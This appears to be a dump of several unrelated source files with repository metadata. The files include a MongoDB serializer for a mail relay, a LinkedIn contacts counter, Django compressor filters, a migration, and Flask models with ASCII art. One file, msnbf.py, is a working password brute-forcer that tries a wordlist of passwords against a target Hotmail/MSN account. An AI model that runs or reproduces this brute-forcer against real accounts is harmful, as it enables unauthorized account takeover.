_filter = {}
for field, value in list(args.items()):
if isinstance(value, (list, tuple)):
_filter[field] = {'$in': value}
elif isinstance(value, str):
_filter[field] = {'$regex': '.*' + re.escape(value) + '.*'}
else:
_filter[field] = value
return _filter
def make_get_filter(self, object_id):
"""
Compose the filter used to retrieve an object by its id.
Defaults to using `{_id: object_id}`.
You may want to override this if you need to provide different logic.
"""
return {self.id_field: object_id}
@defer.inlineCallbacks
def get(self, id):
try:
obj = yield self._collection.find_one(self.make_get_filter(id), fields=self.filtered_fields)
if obj:
obj['id'] = obj.pop('_id')
if 'subject' not in obj and 'subject' in self.filtered_fields and 'header' in obj:
parser = email.parser.BytesHeaderParser(policy=email.policy.default)
msg = parser.parsebytes(obj['header'])
obj['subject'] = msg.get('Subject')
defer.returnValue(obj)
raise NotFound
except IndexError:
raise NotFound
except defer._DefGen_Return:
raise
except:
log.exception("Error in Serializer.get()")
raise
@staticmethod
def make_tx_sort_filter(sort):
if sort is None:
return None
if isinstance(sort, str):
return txmongo.filter.sort(txmongo.filter.ASCENDING(sort))
def _get_direction(value):
if value > 0:
return txmongo.filter.ASCENDING
return txmongo.filter.DESCENDING
assert(isinstance(sort, (list, tuple)))
if len(sort) == 2 and isinstance(sort[0], str):
return txmongo.filter.sort(_get_direction(sort[1](sort[0])))
return txmongo.filter.sort(sort)
@defer.inlineCallbacks
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_filter = self.make_filter(spec)
# log.debug("find() filter: %s", _filter)
results = yield self._collection.find(_filter, fields=self.filtered_fields, skip=skip, limit=limit,
filter=self.make_tx_sort_filter(sort))
items = []
for obj in results:
if '_id' in obj:
obj['id'] = obj.pop('_id')
items.append(obj)
response = {
'items': items
}
if '.total' in self._fields_filter:
response['total'] = yield self._collection.count(_filter)
defer.returnValue(response)
class UserSerializer(Serializer):
model_class = models.User
fields = (
'_id', 'username', 'is_superuser', 'groups'
)
class MailingSerializer(Serializer):
"""
Mailing serializer
"""
model_class = models.Mailing
fields = (
'_id', 'domain_name', 'satellite_group', 'owner_guid',
'mail_from', 'sender_name', 'subject', 'status',
'type', 'tracking_url', 'dkim',
'header',
'dont_close_if_empty',
'submit_time', 'scheduled_start', 'scheduled_end', 'scheduled_duration',
'start_time', 'end_time',
'total_recipient', 'total_sent', 'total_pending', 'total_error',
'total_softbounce',
'read_tracking', 'click_tracking', 'mailing', 'url_encoding',
)
def make_filter(self, args):
mailings_filter = {}
if args:
available_filters = ('domain', 'id', 'status', 'owner_guid', 'satellite_group')
for key in list(args.keys()):
if key not in available_filters:
log.error("Bad filter name '%s'. Available filters are: %s", key, ', '.join(available_filters))
raise ValueError("Bad filter name '%s'. Available filters are: %s" % (key, ', '.join(available_filters)))
if 'domain' in args:
domain = args['domain']
if isinstance(domain, str):
mailings_filter['domain_name'] = domain
else:
mailings_filter['domain_name'] = {'$in': domain}
if 'id' in args:
value = args['id']
ids_list = isinstance(value, (list, tuple)) and value or [value]
mailings_filter['_id'] = {'$in': ids_list}
if 'status' in args:
value = args['status']
status_list = isinstance(value, (list, tuple)) and value or [value]
for status in status_list:
available_status = models.relay_status
status = force_text(status)
if status not in available_status:
log.error("Bad status '%s'. Available status are: %s",
status, ', '.join(available_status))
raise ValueError("Bad status '%s'. Available status are: %s"
% (status, ', '.join(available_status)))
mailings_filter['status'] = {'$in': list(map(force_text, status_list))}
if 'owner_guid' in args:
owners = args['owner_guid']
if isinstance(owners, str):
mailings_filter['owner_guid'] = owners
else:
mailings_filter['owner_guid'] = {'$in': owners}
if 'satellite_group' in args:
satellite_groups = args['satellite_group']
if isinstance(satellite_groups, str):
mailings_filter['satellite_group'] = satellite_groups
else:
mailings_filter['satellite_group'] = {'$in': satellite_groups}
return mailings_filter
class RecipientSerializer(Serializer):
"""
Recipient serializer
"""
model_class = models.MailingRecipient
fields = (
'_id', 'email', 'send_status', 'tracking_id',
'reply_code', 'reply_enhanced_code', 'reply_text', 'smtp_log',
'modified',
'first_try', 'next_try', 'try_count',
'in_progress',
'cloud_client',
)
id_field = 'tracking_id'
@property
def filtered_fields(self):
return list(set(self.fields) & (set(self._fields_filter) | {'tracking_id'}))
@defer.inlineCallbacks
def get(self, id):
recipient = yield super(RecipientSerializer, self).get(force_text(id))
recipient.pop('id')
recipient['id'] = recipient.pop('tracking_id')
defer.returnValue(recipient)
def make_filter(self, args):
_args = args.copy()
if 'mailing' in _args:
_args['mailing.$id'] = _args.pop('mailing')
smtp_reply = _args.pop('smtp_reply', None)
_args = super(RecipientSerializer, self).make_filter(_args)
if smtp_reply:
_args.setdefault('$and', []).append({'$or': [
{'reply_code': smtp_reply},
super(RecipientSerializer, self).make_filter({'reply_text': smtp_reply}),
]})
return _args
class SatelliteSerializer(Serializer):
model_class = models.CloudClient
fields = (
'_id', 'serial', 'enabled', 'paired', 'date_paired', 'shared_key', 'domain_affinity', 'group', 'version',
'settings'
)
class HourlyStatsSerializer(Serializer):
model_class = models.MailingHourlyStats
fields = (
'sender', 'date', 'epoch_hour', 'sent', 'failed', 'tries'
)
# def make_filter(self, args):
# _args = args.copy()
# from_date = dateutil.parser.parse(_args.pop('from_date', None))
# to_date = _args.pop('to_date', None)
# _args.setdefault('date', {})['$gte'] = from_date
# if not to_date:
# to_date = from_date + timedelta(hours=999)
# else:
# to_date = dateutil.parser.parse(to_date)
# _args.setdefault('date', {})['$lte'] = to_date
# _args = super(HourlyStatsSerializer, self).make_filter(_args)
# return _args
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_args = spec.copy()
from_date = _args.pop('from_date', None)
if not from_date:
from_date = datetime.now() - timedelta(hours=24)
from_date = dateutil.parser.parse(from_date, ignoretz=True)
to_date = _args.pop('to_date', None)
_args = self.make_filter(_args)
_args.setdefault('date', {})['$gte'] = from_date
if not to_date:
to_date = from_date + timedelta(hours=999)
else:
to_date = dateutil.parser.parse(to_date, ignoretz=True)
_args.setdefault('date', {})['$lte'] = to_date
response = {
'items': compute_hourly_stats(_args, from_date, to_date)
}
return response
|
agpl-3.0
| 2,927,350,094,673,577,500
| 36.217532
| 125
| 0.567914
| false
| 3.977446
| false
| false
| false
|
peterorum/data-hmm
|
linkedin/by-company.py
|
1
|
1337
|
#!/usr/bin/python
import os
import csv
from collections import Counter
from operator import itemgetter
from prettytable import PrettyTable
# XXX: Place your "Outlook CSV" formatted file of connections from
# http://www.linkedin.com/people/export-settings at the following
# location: resources/ch03-linkedin/my_connections.csv
CSV_FILE = os.path.join("private", 'linkedin-connections.csv')
# Define a set of transforms that converts the first item
# to the second item. Here, we're simply handling some
# commonly known abbreviations, stripping off common suffixes,
# etc.
transforms = [(', Inc.', ''), (', Inc', ''), (', LLC', ''), (', LLP', ''),
(' LLC', ''), (' Inc.', ''), (' Inc', ''), (' AU', ''), (' Australia', ''),
(' Pty Ltd', ''), (' Ltd', '')]
csvReader = csv.DictReader(open(CSV_FILE), delimiter=',', quotechar='"')
contacts = [row for row in csvReader]
companies = [c['Company'].strip() for c in contacts if c['Company'].strip() != '']
for i, _ in enumerate(companies):
for transform in transforms:
companies[i] = companies[i].replace(*transform)
pt = PrettyTable(field_names=['Company', 'Freq'])
pt.align = 'l'
c = Counter(companies)
[pt.add_row([company, freq])
for (company, freq) in sorted(c.items(), key=itemgetter(1), reverse=True)
if freq > 1]
print pt
|
mit
| -3,733,075,963,262,727,700
| 29.409091
| 91
| 0.646223
| false
| 3.463731
| false
| false
| false
|
leleobhz/scripts
|
python/others_utilities/msnbf.py
|
1
|
3708
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hotmail brute forcer
# programmer : gunslinger_
# Inspired by mywisdom
# This program is only for educational purposes only.
import sys, time, msnp
__Author__ = "Gunslinger_ - Modified by Leleobhz"
__Version__ = "1.0"
__Date__ = "Mon, 22 Feb 2010 13:13:43 +0700 "
log = "msnbrute.log"
file = open(log, "a")
counter = 0
face = '''
MSN brute forcer
programmer : %s
version : %s
date release : %s
''' % (__Author__, __Version__, __Date__)
help = '''
Usage : ./msnbf.py -u [email] -w [wordlist]
Example : ./msnbf.py -u suckthedick@hotmail.com -w wordlist.txt
'''
for arg in sys.argv:
if arg.lower() == '-u' or arg.lower() == '--user':
email = sys.argv[int(sys.argv.index(arg))+1]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
print face
print help
file.write(face)
file.write(help)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
def definer():
print "-" * 60
print "[+] Email : %s" % email
print "[+] Wordlist : %s" % wordlist
print "[+] Length wordlist : %s " % len(words)
print "[+] Time Starting : %s" % time.strftime("%X")
print "-" * 60
file.write ("\n[+] Email : %s" % email)
file.write ("\n[+] Wordlist : %s" % wordlist)
file.write ("\n[+] length wordlist : %s " % len(words))
file.write ("\n[+] Time Starting : %s" % time.strftime("%X"))
class msnnologin(Exception):
def __init__(self, output):
self.output = output
def __str__(self):
return repr(self.output)
def msnparse():
def state_changed(self, state):
if state == "New state: NLN":
return 0
else:
raise msnnologin(state)
def main(password):
global counter
sys.stdout.write ("[-] Trying : %s \n" % (password))
sys.stdout.flush()
file.write("[-] Trying : %s \n" % (str(password)))
try:
msntmp = msnp.Session(msnparse())
msntmp.login(email, password)
print "[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password)
file.write("[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password))
sys.exit(1)
except msnp.error.HttpError:
exit
except msnnologin:
exit
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
counter+=1
if counter == len(words)/5:
print "[+] Hotmailbruteforcer 20% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/4:
print "[+] Hotmailbruteforcer 25% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/2:
print "[+] Hotmailbruteforcer on 50% done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on halfway done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words):
print "[+] Hotmailbruteforcer done...\n"
file.write("[+] Hotmailbruteforcer done...!\n")
msntmp.logout()
if __name__ == '__main__':
print face
file.write(face)
definer()
for password in words:
main(password.replace("\n",""))
main(password)
|
gpl-2.0
| -3,270,820,469,121,388,000
| 29.393443
| 118
| 0.591963
| false
| 2.926598
| false
| false
| false
|
kottenator/django-compressor-toolkit
|
compressor_toolkit/filters.py
|
1
|
3854
|
import logging
import os
import re
from compressor.filters.css_default import CssAbsoluteFilter
from compressor.filters.datauri import CssDataUriFilter as BaseCssDataUriFilter
from django.apps import apps
from django.conf import settings
app_config = apps.get_app_config('compressor_toolkit')
logger = logging.getLogger(__file__)
class CssRelativeFilter(CssAbsoluteFilter):
"""
Do similar to ``CssAbsoluteFilter`` URL processing
but replace ``settings.COMPRESS_URL`` prefix with '../' * (N + 1),
where N is the *depth* of ``settings.COMPRESS_OUTPUT_DIR`` folder.
E.g. by default ``settings.COMPRESS_OUTPUT_DIR == 'CACHE'``,
its depth N == 1, prefix == '../' * (1 + 1) == '../../'.
If ``settings.COMPRESS_OUTPUT_DIR == 'my/compiled/data'``,
its depth N == 3, prefix == '../' * (3 + 1) == '../../../../'.
How does it work:
- original file URL: '/static/my-app/style.css'
- it has an image link: ``url(images/logo.svg)``
- compiled file URL: '/static/CACHE/css/abcdef123456.css'
- replaced image link URL: ``url(../../my-app/images/logo.svg)``
"""
def add_suffix(self, url):
url = super(CssRelativeFilter, self).add_suffix(url)
old_prefix = self.url
if self.has_scheme:
old_prefix = '{}{}'.format(self.protocol, old_prefix)
# One level up from 'css' / 'js' folder
new_prefix = '..'
# N levels up from ``settings.COMPRESS_OUTPUT_DIR``
new_prefix += '/..' * len(list(filter(
None, os.path.normpath(settings.COMPRESS_OUTPUT_DIR).split(os.sep)
)))
return re.sub('^{}'.format(old_prefix), new_prefix, url)
class CssDataUriFilter(BaseCssDataUriFilter):
"""
Override default ``compressor.filters.datauri.CssDataUriFilter``:
- fix https://github.com/django-compressor/django-compressor/issues/776
- introduce new settings - ``COMPRESS_DATA_URI_INCLUDE_PATHS`` and
``COMPRESS_DATA_URI_EXCLUDE_PATHS`` - to filter only specific file paths or extensions,
e.g. ``settings.COMPRESS_DATA_URI_INCLUDE_PATHS = '\.svg$'``.
"""
def input(self, filename=None, **kwargs):
if not filename:
return self.content
# Store filename - we'll use it to build file paths
self.filename = filename
output = self.content
for url_pattern in self.url_patterns:
output = url_pattern.sub(self.data_uri_converter, output)
return output
def data_uri_converter(self, matchobj):
url = matchobj.group(1).strip(' \'"')
# Don't process URLs that start with: 'data:', 'http://', 'https://' and '/'.
# We're interested only in relative URLs like 'images/icon.png' or '../images/icon.svg'
if not re.match('^(data:|https?://|/)', url):
file_path = self.get_file_path(url)
# Include specific file paths (optional)
file_path_included = bool(
not hasattr(settings, 'COMPRESS_DATA_URI_INCLUDE_PATHS') or
re.match(settings.COMPRESS_DATA_URI_INCLUDE_PATHS, file_path)
)
# Exclude specific file paths (optional)
file_path_excluded = bool(
hasattr(settings, 'COMPRESS_DATA_URI_EXCLUDE_PATHS') and
re.match(settings.COMPRESS_DATA_URI_EXCLUDE_PATHS, file_path)
)
if file_path_included and not file_path_excluded:
try:
return super(CssDataUriFilter, self).data_uri_converter(matchobj)
except OSError:
logger.warning('"{}" file not found'.format(file_path))
return 'url("{}")'.format(url)
def get_file_path(self, url):
file_path = re.sub('[#?].*$', '', url)
return os.path.abspath(os.path.join(os.path.dirname(self.filename), file_path))
|
mit
| 1,912,537,893,408,338,700
| 38.731959
| 95
| 0.608978
| false
| 3.69511
| false
| false
| false
|
adam2392/smile
|
smile/accounts/migrations/0002_auto_20160313_1723.py
|
1
|
1197
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-03-13 17:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('admins', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='AvailableProject',
),
migrations.AddField(
model_name='userprofile',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='admins.AvailableProject'),
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
apache-2.0
| -3,652,358,345,451,040,300
| 30.5
| 114
| 0.60401
| false
| 4.352727
| false
| false
| false
|
dimitdim/GetARoom
|
Main/app/models.py
|
1
|
13192
|
__author__ = 'kflores'
"""
Model that defines the class structure of the database.
"""
from app import db
ROLE_USER = 0
ROLE_ADMIN = 1
class Node(db.Model):
"""class representation of one networked sensor kit hooked into ethernet. Instatiation requires the name, ip address, and location of the "node", but all of these values should be placed into the config file (see get_node_config(filename) in download_data.py)
"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
ip = db.Column(db.String)
loc = db.Column(db.String, index=True, unique=True)
data = db.relationship('Data', backref='origin', lazy='dynamic')
status = db.relationship('Status', backref='origin', lazy='dynamic')
def __init__(self, name, ip, loc):
self.name = name
self.ip = ip
self.loc = loc
def __repr__(self):
return '%s is at %s in %s' % (self.name, self.ip, self.loc)
class Data(db.Model):
"""
Class representation of one data row in the datatable. This object records the local time, node uptime, brightness, temperature, door IR sensor, and the time the door was last opened. Volume is a dummy variable for feature that is not yet implemented. node_id ties the Data objects to the node object that created them (the location they are at)
"""
id = db.Column(db.Integer, primary_key=True)
localtimestamp = db.Column(db.Integer)
uptime = db.Column(db.Integer)
brightness = db.Column(db.Integer)
temperature = db.Column(db.Integer)
volume = db.Column(db.Integer)
door = db.Column(db.Integer)
last_opened = db.Column(db.Integer)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, localtimestamp, uptime, brightness, temperature, volume, door, last_opened, origin):
self.localtimestamp = localtimestamp
self.uptime = uptime
self.brightness = brightness
self.temperature = temperature
self.volume = volume
self.door = door
self.last_opened = last_opened
self.origin = origin
def __repr__(self):
return "Light: %s, Temp: %s, Last: %s" % (self.brightness, self.temperature, self.last_opened)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
role = db.Column(db.SmallInteger, default=ROLE_USER)
temp = db.Column(db.String(4), default='f')
posts = db.relationship('Post', backref='author', lazy='dynamic')
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id)
def __repr__(self):
return '<User %r>' % (self.nickname)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post %r>' % (self.body)
class Status(db.Model):
"""
Object for storing room status values. An analysis routine that processes sensor data and reaches a conclusion on room state will instatiate these objects. WIP.
"""
id = db.Column(db.Integer, primary_key=True)
start = db.Column(db.Integer)
status = db.Column(db.Boolean)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, start, status, origin):
self.start = start
self.status = status
self.origin = origin
#=======================ittVBBBMMMWMMMMMMMMMMWWWWWWWWWWMMWWMMBRRRXYIi=================================================
#=======================iIXBRBMMMMWWWWWWMMMMMMWWWWMMMMMMMWWWWWMMMWRYt+================================================
#======================+YRBBMMMMMWWWWWWMMMMMMMMWWWWWWMMMWWWWWWMMMWWBVt================================================
#=====================+tRMBMMWWMWWWWWMMMMMMMMMMMWWWWWWWWWWWWWWWWMWMMBY================================================
#====================+tIRMWMWWWWMWWWWMMMMMMMMMMMWWWWWWWWWWMMWMWWMWWWMR================================================
#===================iYtVBWMMWWMWWWWWMMMMMMMMMMMMWWWWWWWWWWWMMMWWWWWWWMV+=;============================================
#==================+VXRBMWMMMMWWMMWWWWWMMMMMMMWMWWWWWWWWWWWWWWWWWWWWWBXY+=;===========================================
#=================;iXXMMMMWMWWWMBMMMWWMMWMMMMMMMMMWWWWWWWWWWWWWWWWWWWMVVi=;===========================================
#==================YBMBMWWWMWWMMMMMBMMMMBMBMMMMMMMMMWMMMMWWWWWWWMWWWWWMVi;=;==========================================
#=================tBMBMMWWMMMBMMWWWWMBMMMBBMMMMMMWMMMBBMMMWWWWWWWWWWWWWBY=;===========================================
#================+RMBBMMWWMWMBMWWWWWWWBBBRBMMMMMMWWMMBBBBMWWWWWWWWWWWWWWXi============================================
#================tMMMMMMWMWWMMWWWMMMWWMBRRRBXBMMWMMMMBBRRRBMWWWWWWWWWWWWBI+=;=========================================
#================IMMWMWMMWWWWWWWMBMMMWWMRXXXVRBBMBBMMBRXVVVRBWW#WWWMWWWWMRt==;;=======================================
#================VMMWMWWWWWWWWMMMMMMMBMBRVVVXRXBRBBBRRXVYYYVRBWWWWWWWWWWMMXY+;========================================
#===============tRMWWWWWWWWWWWWMMMMBRRRRXVYVVVVXXRRXVVYYIYYYVRMMWWWWWWWWWWBV==========================================
#===============YMMWWWWWWWWWWMMBBBBBBRXXVVVVYYVYXRXVYIIIIIYVVXRMWWWWWWWWWMBY==========================================
#============;=+XMMWWWWW##WWMRRRRRRRRXXVYYYYYYVVXXYIIIIIIYYVVVXBWWWWWWWWWWMI;;========================================
#============;IXBWMWWWWW#WWWBXVVVVVVYYYYIIttIYVVYIIIIIIIIYYVVVXBMWWWWWWWWWMY=;========================================
#============+XMMWWWWWWWWWWMRXVVYYYIIIItIIiitIIttttItIIIIYYVVVXRMMWWWWWWWMMY==========================================
#============tVMWWWWWWWWWWMBRXVYYYIIItttttiittiiittttIIIYYYYVVXRMMWWWWWWWMBI==;=======================================
#============iXWWWWW#WMW#WMRRXVYYYIIttttttiiiiiitiittIIIYYYYYVVRMWWWWWWWWMVt==========================================
#=============VWWWWWWWW##WMRXXVVYYIIttiiiii+iiitiittIIIIIIYYYYVXBWWWWWWWWBYi=;========================================
#=============VWWWWWMWW##WMRXXVVYYIIIIti++iiiiiiittttIIIIIIIYYVVXMWWWWWWMBYi;;========================================
#============+IBWMMMMW##WWBRXXVYYYIIIttii+iiiiiitttttttttIVVYYYYYBWWWWWMBBXi;;========================================
#============itXWWWWWWW##WMRXVVVYYYIIttiiiii++iiiiiiiIYVXBBRRXVYYRWWWMBWBRV=;;========================================
#============+IVBWW#WW###WMRXVVYYYIIIttiiiiiiiiiiiitYRBBMBXXXRXYYVMWMBRWWXi=;;========================================
#=============tIXMW#WWWW#WMRXVVYIIIIttiiiiiiiiiiiitYXRXXVYIIIYYYIYBMRXRWWX+;;;========================================
#=============+IYXBWWWWW#WBXVVVYYYYYYYItiiii++++iiIYVVYYItIItIIIIIXMBXRWMV+=;=========================================
#==============tYYRW#WWWWWBVVVVVRRBBBBRXYtii+++++iIYYIYYYIYIIIIIIIVBMXRWRI+=;=========================================
#==============iIYRWWWMWWWRVYVXBMMMMRRXXVtii+++++itIYVXVVXXXYYIIIIYRBXVRYi=;;=========================================
#===============tYXMWMBWWWRYYYRRXVVVVVVVYYti+++++iIYVXVRRYVRRVItIIIXBXYVIi=;;;;=======================================
#===============+IXMWRVMWWRYYYXVIIIIYYVVVYItiiiiitYVXYVMMI+YRYttIIIVBVIIIi=;;=========================================
#================iVMWRYBMWRYYYVYIIYYVVXXXVVYItiitYVVV+YBMViYXYIttIIYRYtIt+=;;=========================================
#=================YBMBIRMWRYYYYYYYXRRRMRYXXXVIiitYYYI+=XXtIVVYIttIIYRVtti;;;;=========================================
#===============++iRMMVVWMRYIYYYYXRRtBBBitVVVYtitYYYYYIttYVVYIttttIYXVtt+;============================================
#================+tVBMRYXBRYIIIYYXRYiRMBi+IVVYtitIYYYYYYVVYYItttttIYVYtti+++++++ii++++++==============================
#================+tIVXMYtRBYYIIIIYXVItVItYVYYYIttIIIIIIIIIIIttittIIYYVIti+iiiiiiiiiiiiii++++==========================
#=================itIYXYtVBYYIttIYVXXXYYVYIIYYItitIIttittttttiiitttIYVItiiiiiiiiiiiiiiiiiiiii+========================
#=================+tIIYYIYRVYIIttIIYVVVYYIttYYItitIIttii++i+iiiittIIYYiiiiiiiiiiiiiiiiiiiiiiii++======================
#==================+ttYIItXXYIItttttIYIItiiIYYItittItttii++++iitttIIVViiiiiittttttttttttttttiiii++====================
#====================tIIttYXYYIttiitttttiittYYItiitIIIIiiiiiiiittIIIVViiitttttttttttttttttttttttii++==================
#=====================iIttYXYYIItiiiiiii+iiIYIIt+itttIYYtiiiiiittIIYVViittttttttttttttttitttttttttii+=================
#=====================+tItIXVYIIttiii+++iitYIIIi++ititYYYIitttttIIYYXYtiiittttttttttttttttttttttttttii+===============
#==================;=;=tIttXVYIIIttii+++iiIYttIi++itttIIYYIIttIIIYYVXYttiittttttttttttttttttttttttttttii+=============
#====================;=iYVVRXYYIIttiiiiiitYYttItiitYYYIIIYVYIIIYYYYVXItttitttttttttttttttttttttttttttttti+============
#===================;;=itYVRXVYYIIttiiiiiIYYYYVYIIIYYYIIYYVVVYYYYYYVXItttittttttttttttttttttttttttttttttti+==+========
#====================;=itIVRRVVYIIItttttIYYYYYYYIIttIIIIYVVXVVYYYVVXXItttitttttttttttttttttttttttttttttttti+==========
#=====================+ttIYBRXVYYYIIItttIVYYYIItiiiitItIIYVVVVYYVYVRVIttttttttttttttttttttttttttttttttttttti+=========
#===================+iitttYBBXXVYYYIIIIIVVYYIIItiiiitYYYVVVVVYYYVYVRVItttttttttttttttttttttttttttttttttttttti+===+====
#=================+iiiitttYRBRXVVVYYYIYYXVVYIIIIItIIIItYXVXXVYYYYYXRYIttttttttttttttttttttttttttttttttttttttti+=======
#==============+++itiiitttIXRRXXXVYYYYYYXVVYVVYIIti=;=iYVtVVVYYYYVRRIIItttitttttttttttttttttttttttttttttttttttt++==+==
#=============+iitttiiitttIYRRRXXVVYYYYYVVXXXVt+=;=;+tttYtYVVYYYVVRRIIIttttttttttttttttttttttttttttttttttttttttti+=+==
#==========++iittttttiittIIYXRRRXXVYYYYYYVXXYVIttitttiitItYYVYYVVXRRIIIttttttttttttttttttttttttttttttttttttttIItti+===
#=========+iitttttttttttttIYVXRRRXVYYYYYYYXVttYiiiiiiiiIIIIYVVVVVRRRIIItttttttttttttttttttttttttttttttttttttttIIIti===
#======+++iiitttttttttttttIYYVRBRRXVVVYYIYVVItYti++iiitItIIYVVVVXRRRYIItttttttttttttttttttttttttttttttttttttttIIIIti==
#++===++iiitttttttttttttttIYYVXRRRRXVYYYYYVYIttItiititIItIYVVVVXXRRRIIItttttttttttttttttttttttttttttttttttttttIIIIIt+=
#===++iittttttttttttttttttIIYYVRBRRXXVVYYYVVYIitYIIIIYVYIIYVVVXXRXRRIIIttttttttttttttttttttttttttttttttttttttttIIIIIt=
#=++iittttttttttttttttttttIIYYYXBRRRXXVVYYVVVIttYYIIIYYIIIYVVVXRRXRRIItttItttttttttttttttttttttttttttttttttttttIIIIII=
#+iiitttttttttttttttttttttIIIYYYRRRRRXVVVYVVVYIttIIIYIttIYYVVXXRRXBXIIttIItttttttttttttttttttttttttttttttttttttIIIIII+
#ittitttttttttttttttttttttIIIYYYVRRRRRXXXVVVVVVItttiiitIYYVYVXXRRXBXIIttIttttttttttttttttttttttttttttttttIttttttIIIIIi
#ttttttttttttttttttttttttttIIIIYYXRXBBXXXXVYVXXVIItttIIYVVVYXRRRRXMXIItttttttttttttttttttttttttttttttttttIttttttIIIIIt
#ttttitttttttttttItttttttttIIYIIIYXXXRBRXXXVVVXXVVYYVXXVVYIVRRRXXRMVItttttttttttttttttttttttttttttttttttIIItttIttIIIIt
#tttttttttttttttttttttttIItIIIYIIIVRVXRRRXRXXVYVXXXXXVVYYIYXRRXVVBWVttttttttttttttttttttttttttttttttttttIIIttttttIIIIt
#ttttttttttttttItttIIttttIttIIIIIIIVXVYRRRRRRVYIYYYYIIIIIIVRBXVVYBWYtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#ttttttttttttttIIIItIItttIttIIIIIIIYVRXYXBRXRRXYIIIttIttIVRBXVYYYBWVtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#tIttttttttttIIIIIIIIItttItttIIIIIIYYXXXYVRRRRRXYIYIIIYYVRRXYYYIIMWXttttttttttttttttttttttttttttttttttttIIIItttIIIIIII
#ttttttttttttIIIIIIIIItttIIttIIIIIIYIXXXXVVXRRRBXVYYYYYXRRVYIIIIIBRYttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttttIIIIIIIIIIIItttIItttIIIIIIIYRVXXXVVXRRBBRRRRRRVItIIttIIVItttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttIIIIIIIIIIIIIItttIIIttIIIIIIIIVBVVVVVVYVXXXXVVYIttttttIItttttttttttttttttIttttttttttttttttttttttIIIIItIIIIIIIt
#tttIttttttIIIIIIIIIttttIIIItttIIIIIIIIRMYIYYYYYIIttttitttttttItttttttttttttttIIItttttttttttttttttttttttIItIIIIIIIIIIt
#tttIIIIIIIIIIIIIIIIIttttIIIIttIIIIYIIIYBMYttIIIItttttttttttttttttttttttttttttttttttttttttttttttttttttttIItIIIIIIIIIIt
#IIIIIIIIIIIIIIIIIIIIIttttIIItttIIIIIIIIVMMYittttttttitttttttIttttItttIIItttttttttttttttttttttttttttttttIIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIIItttIIIItttIIIIIIYtXWMYitiiiiiiiitttttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIItIIttIIIIttIIIIIIIIIRWRIttiiiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIttttttttttttIIttIIIttIIIIIIIIIIVYIItttiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIttIIItIIIIIIIIIIIIIttIIIIIIIIIIttIIIItitiittttIIttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttttIItIIIttttttItttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIYYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttIItIIIItIttttIItttttttIIttttttttttttttttttttttttttttttttttttIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItItttttIIIIttttIIIItttIYIttIIIIIIIItIttttttIItttttttttttttttttttttttttttttttttttttIIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItttttttIIIItttttIIItIIIIYIttIttttIIIItttttIIttttttttttttttttttttttttttttttttttttttIIIIIIYYYIIYYI
|
gpl-2.0
| -1,536,256,754,729,362,000
| 70.308108
| 352
| 0.673817
| false
| 2.625274
| false
| false
| false
|
googleapis/googleapis-gen
|
google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform_v1/services/migration_service/transports/grpc_asyncio.py
|
1
|
14287
|
# -*- coding: utf-8 -*-
